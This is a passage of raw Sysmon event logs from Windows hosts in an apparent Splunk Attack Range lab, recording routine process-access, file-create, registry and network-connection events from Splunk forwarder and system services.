09:09:46.007{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.007{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.007{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.007{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A59-6151-267A-00000000FC01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.992{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A59-6151-267A-00000000FC01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.992{5EBD8912-8A59-6151-267A-00000000FC01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:47.724{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C159A645295DA3562A70551AEE49A87,SHA256=F6C1ADDD5A1D0B7E4AF8DCBB7E0E411CC8E3B125B476D2D9BAA932E1911C7C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978421Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:47.345{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4464E1EE5B278513DE72AEFF73C56F1,SHA256=64A4D35E0574243EE5F9CCF43591460C2DA05DC5A906B13F9D9C6255DF5DE1DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:47.006{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99E422B442BB911804770D685AF39CCA,SHA256=71AE2D5F62F50281820BA721092B7CC7B5BB0FFB003834E37A74441C211BBF22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:48.742{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C8DE28B1DF90B83CB97623056094DE,SHA256=2D886C7307F24BF515DB82A6C2C85760CAA89E74EAAB7D52DE802BAC3953B04D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978424Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:45.672{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55583-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978423Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:48.720{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9CF3C64B2043BB26D6D097B447D1791E,SHA256=C4D6DD9D4B43A4CA42344958AFC2C00A962BF344ED0A5C69C0B23F0683E8B9CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978422Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:48.361{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD77C2455FC7B7AB4A2D6F5941AA8F49,SHA256=16EB2E0FB9B1D4B4FEF72CA65239B44399B541BFBD867DF1982C123D8EA18D46,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.147{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64113-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:49.745{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=387D64641B44A602032CE398CC1E3591,SHA256=79F4F032EC7D10768D51454EB8DBFF0C09075B8079131AD8E488499C59CFFEF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978425Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:49.376{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294ED8329CD3A8C99FC87388B4107EF9,SHA256=093F8D421FCE70D443D31BD4AE19ABEE996344202F5E816C87B1138132B3CD0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:47.881{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53337-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:50.775{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208313FA51736CBC383D44DADA9EAB0F,SHA256=51D99F6F0B5C34CA6D8E9983026172BBFB3288658C4E08DFF1E6D7E04416E55C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978426Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:50.376{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF3E2E3A00DBCE69A34CD3D65B64F501,SHA256=12A97716E83D07072BC908057B36C7FD29C6221BCCF7EF9FBEE49B06169F9892,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:09:51.907{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b37f-0x6e09c9d4) 23542300x80000000000000001049769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:51.824{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AA2AEA853E19A9F05B0B11F9DC665AF,SHA256=54EBAB19B82BF69D7F9A45B25C2BC78C4C3EB4B47846BDDE09DA93FFED75FCC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978427Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:51.392{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ED2E75996B0410A603DDB2E33B756EC,SHA256=6AFFE7E190977D8A169FB64E802B2459D08085134A01063E99C9FA07914930A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:52.843{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A780B6DBB5DE47FFA9123921E4E868BE,SHA256=287B6C75F95B2AECE3ADB46049DA58665A9B650C39E39E7D12926EBD6B254C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978429Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:52.611{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DE0D1EFF6E439A60E296A6786F15450,SHA256=59A05F0A88EBEF8507487F5EFFED235776B45946C028E0D26CEB2E3ADA519327,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978428Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:52.408{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A5947240FB9D94626F19B60028ABD4E,SHA256=FBB3F04EA1CF5C4899D30B71DEF97B551DDE00C265B39F15CFAA8516ECFD4ACB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:53.858{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65C9F1D9FBFB2F61EDA8832D99C0DDFF,SHA256=89C7D63AD43AD3790F8A8D16098AEB4BA0FCE0F5464E8A2C2ACD3D4A4ED03B00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978432Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:53.427{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB2CEA16FDC58D6332B577A036A4FC8,SHA256=67B9318A699970B7EF91208D8EBEA5DF27E7FE32B7394D96AE0776DF6C3994D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:51.568{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-429.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x80000000000000001049774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:51.363{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de50941-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:53.059{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A1F1FA2187EA286370FD02E580CE393,SHA256=7B056103555306F1DD43C488FA3CB3FDE7F372364385F396D98DBCDBCADFF02D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:53.059{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2986693B0A68CE465979A5F15D38AEE1,SHA256=DBEBBA242BFC1145193909BDCDDBE5A678FB39F1ABD8B84AF07D9E4D9EAF6B9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978431Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:49.770{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59361-false10.0.1.12-8000- 354300x8000000000000000978430Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:49.696{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58063-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001049795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.929{5EBD8912-8A62-6151-287A-00000000FC01}64724360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.860{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=196625E2F715A0630F30EC1D36BF7727,SHA256=F18211352C449C6CC20E5CB54AE6A4F92814CE1F5B1B234D4087F617F8680A07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978433Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:54.439{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C94188410F170DBDF0E13DD279DCD3BD,SHA256=B4C93856E92562E315A874F9905545ADB240D45611E38692A9D5482CD4C776D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A62-6151-287A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A62-6151-287A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:54.729{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A62-6151-287A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 